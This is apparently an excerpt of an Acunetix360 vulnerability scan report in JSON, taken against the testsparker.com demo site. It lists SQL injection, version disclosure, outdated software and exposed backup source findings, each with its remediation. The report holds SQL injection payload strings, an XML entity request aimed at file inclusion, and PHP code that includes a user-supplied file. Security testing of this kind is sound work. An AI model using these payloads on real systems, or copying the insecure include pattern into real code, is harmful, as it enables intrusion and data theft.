    131 JANE JACKMAN 2012-03-13 12:14:54 22
    132 ADAM HOPPER 2012-03-13 12:14:54 22
    133 RICHARD PENN 2012-03-13 12:14:54 22
    134 GENE HOPKINS 2012-03-13 12:14:54 22
    135 RITA REYNOLDS 2012-03-13 12:14:54 22
    136 ED MANSFIELD 2012-03-13 12:14:54 22
    137 MORGAN WILLIAMS 2012-03-13 12:14:54 22
    138 LUCILLE DEE 2012-03-13 12:14:54 22
    139 EWAN GOODING 2012-03-13 12:14:54 22
    140 WHOOPI HURT 2012-03-13 12:14:54 22
    141 CATE HARRIS 2012-03-13 12:14:54 22
    142 JADA RYDER 2012-03-13 12:14:54 22
    143 RIVER DEAN 2012-03-13 12:14:54 22
    144 ANGELA WITHERSPOON 2012-03-13 12:14:54 22
    145 KIM ALLEN 2012-03-13 12:14:54 22
    146 ALBERT JOHANSSON 2012-03-13 12:14:54 22
    147 FAY WINSLET 2012-03-13 12:14:54 22
    148 EMILY DEE 2012-03-13 12:14:54 22
    149 RUSSELL TEMPLE 2012-03-13 12:14:54 22
    150 JAYNE NOLTE 2012-03-13 12:14:54 22
    151 GEOFFREY HESTON 2012-03-13 12:14:54 22
    152 BEN HARRIS 2012-03-13 12:14:54 22
    153 MINNIE KILMER 2012-03-13 12:14:54 22
    154 MERYL GIBSON 2012-03-13 12:14:54 22
    155 IAN TANDY 2012-03-13 12:14:54 22
    156 FAY WOOD 2012-03-13 12:14:54 22
    157 GRETA MALDEN 2012-03-13 12:14:54 22
    158 VIVIEN BASINGER 2012-03-13 12:14:54 22
    159 LAURA BRODY 2012-03-13 12:14:54 22
    160 CHRIS DEPP 2012-03-13 12:14:54 22
    161 HARVEY HOPE 2012-03-13 12:14:54 22
    162 OPRAH KILMER 2012-03-13 12:14:54 22
    163 CHRISTOPHER WEST 2012-03-13 12:14:54 22
    164 HUMPHREY WILLIS 2012-03-13 12:14:54 22
    165 AL GARLAND 2012-03-13 12:14:54 22
    166 NICK DEGENERES 2012-03-13 12:14:54 22
    167 LAURENCE BULLOCK 2012-03-13 12:14:54 22
    168 WILL WILSON 2012-03-13 12:14:54 22
    169 KENNETH HOFFMAN 2012-03-13 12:14:54 22
    170 MENA HOPPER 2012-03-13 12:14:54 22
    171 OLYMPIA PFEIFFER 2012-03-13 12:14:54 22
    172 GROUCHO WILLIAMS 2012-03-13 12:14:54 22
    173 ALAN DREYFUSS 2012-03-13 12:14:54 22
    174 MICHAEL BENING 2012-03-13 12:14:54 22
    175 WILLIAM HACKMAN 2012-03-13 12:14:54 22
    176 JON CHASE 2012-03-13 12:14:54 22
    177 GENE MCKELLEN 2012-03-13 12:14:54 22
    178 LISA MONROE 2012-03-13 12:14:54 22
    179 ED GUINESS 2012-03-13 12:14:54 22
    180 JEFF SILVERSTONE 2012-03-13 12:14:54 22
    181 MATTHEW CARREY 2012-03-13 12:14:54 22
    182 DEBBIE AKROYD 2012-03-13 12:14:54 22
    183 RUSSELL CLOSE 2012-03-13 12:14:54 22
    184 HUMPHREY GARLAND 2012-03-13 12:14:54 22
    185 MICHAEL BOLGER 2012-03-13 12:14:54 22
    186 JULIA ZELLWEGER 2012-03-13 12:14:54 22
    187 RENEE BALL 2012-03-13 12:14:54 22
    188 ROCK DUKAKIS 2012-03-13 12:14:54 22
    189 CUBA BIRCH 2012-03-13 12:14:54 22
    190 AUDREY BAILEY 2012-03-13 12:14:54 22
    191 GREGORY GOODING 2012-03-13 12:14:54 22
    192 JOHN SUVARI 2012-03-13 12:14:54 22
    193 BURT TEMPLE 2012-03-13 12:14:54 22
    194 MERYL ALLEN 2012-03-13 12:14:54 22
    195 JAYNE SILVERSTONE 2012-03-13 12:14:54 22
    196 BELA WALKEN 2012-03-13 12:14:54 22
    197 REESE WEST 2012-03-13 12:14:54 22
    198 MARY KEITEL 2012-03-13 12:14:54 22
    199 JULIA FAWCETT 2012-03-13 12:14:54 22
    200 THORA TEMPLE 2012-03-13 12:14:54 22
    412 -1 OR 1=1 test 2012-03-13 12:14:54 22
    413 -1 OR 1=1 test 2012-03-13 12:14:54 22
    414 NS1NO test 2012-03-13 12:14:54 22
    415 1 AND 'NS='ss test 2012-03-13 12:14:54 22
    416 ' OR 'ns'='ns test 2012-03-13 12:14:54 22
    417 -1 OR 17-7=10 test 2012-03-13 12:14:54 22
    418 1 OR X='ss test 2012-03-13 12:14:54 22
    419 ' OR '1'='1 test 2012-03-13 12:14:54 22
    420 ' OR '1'='1 test 2012-03-13 12:14:54 22

    \n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      Acunetix xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \n\n
    \n\tThis website is automatically reset at every midnight (00:00 - UTC).\n
    \n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "dbd0a5a8-18d2-471a-7b37-ad490211f0f0", + "Impact": "
    Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:\n
      \n
    • Reading, updating and deleting arbitrary data/tables from the database
    • \n
    • Executing commands on the underlying operating system
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Boolean Based SQL Injection", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
    4. \n
    5. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
    6. \n
    7. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.
    8. \n
    \n
    ", + "RemedialProcedure": "
    The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "ConfirmedBooleanSqlInjection", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

    Acunetix360 identified a version disclosure (Apache) in the target web server's HTTP response.

    \n

    This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "2.2.8" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "fbb65b68-873e-4fff-871d-ad48024dd60f", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "ApacheVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

    Acunetix360 identified a version disclosure (PHP) in target web server's HTTP response.

    \n

    This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "5.2.6" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "d765b64b-8f6a-4343-872d-ad48024dd723", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "PhpVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 50, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "87", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cwe": "530", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A7", + "OwaspProactiveControls": "", + "Pci32": "6.5.8", + "Wasc": "34" + }, + "Confirmed": false, + "Description": "

    Acunetix360 detected backup source code on your web server.

    <?php\nrequire("auth.php");\nini_set("display_errors","0");\n\n//global configuration area\n$globals["title"] = "Acunetix Test Web Site -  PHP";\nfunction EndsWith($FullStr, $EndStr)\n{\n    // Get the length of the end string\n    $StrLen = strlen($EndStr);\n    // Look at the end of FullStr for the substring the size of EndStr\n    $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen);\n    // If it matches, it does end with EndStr\n    return $FullStrEnd == $EndStr;\n}\n?>\n…\n<?php include "Internals/header.php"?>\n…\n<?php include "Internals/upmenu.php"?>\n…\n<?php\n            $file = $_REQUEST["file"];\n            if(EndsWith($file,".nsp"))\n                include $_REQUEST["file"];\n        ?>\n…\n<?php include "Internals/footer.php"?>
    ", + "ExploitationSkills": "
    This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application resides on.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "24/06/2021 10:07 AM", + "HttpRequest": { + "Content": "POST /process.bak HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nContent-Length: 124\r\nContent-Type: application/xml\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.bak\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n]>&lfi;", + "Method": "POST", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 834\r\nLast-Modified: Thu, 30 Jul 2020 08:09:20 GMT\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Thu, 24 Jun 2021 22:55:27 GMT\r\nETag: \"1200000001ba62-342-5aba4307c6c00\"\r\n\r\n\n\n\n\n
    \n \n\t \n\t\n
    \n\n\n\t\n\n\n", + "Duration": 20.6716, + "StatusCode": 200 + }, + "LookupId": "3937a826-c79e-4b14-7696-ad5101871463", + "Impact": "
    Depending on the nature of the source code disclosed, an attacker can mount one or more of the following types of attacks:\n
      \n
    • Access the database or other data resources. With the privileges of the account obtained, attempt to read, update or delete arbitrary data from the database.
    • \n
    • Access password protected administrative mechanisms such as \"dashboard\", \"management console\" and \"admin panel\" potentially leading to full control of the application.
    • \n
    • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:55 AM", + "Name": "Backup Source Code Detected", + "ProofOfConcept": "", + "RemedialActions": "
    \n

    Remove all temporary and backup files.

    \n
    ", + "RemedialProcedure": "", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "BackupSourceCodeFound", + "Url": "http://php.testsparker.com/process.bak" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Acunetix360 identified you are using an out-of-date version of Apache.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "2.2.8" + }, + { + "Name": "Latest Version", + "Value": "2.4.48" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "0e4d0f49-8783-4b29-8718-ad48024dd57e", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server DEPRECATED: Code Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of CRLF Sequences ('CRLF Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Authentication Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Out-of-date Version (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    Please upgrade your installation of Apache to the latest stable version.

    \n
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Present", + "Type": "ApacheOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.8" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.4" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.4" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Acunetix360 identified you are using an out-of-date version of MySQL.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.0.51b" + }, + { + "Name": "Latest Version", + "Value": "8.0.25" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + } + ], + "FirstSeenDate": "16/06/2021 12:35 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nAcunetix Test Web Site - PHP\n\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t

    Artist Service

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\t\t\t\t\t

    \n \n

    Results: -1 OR 17-7=10


    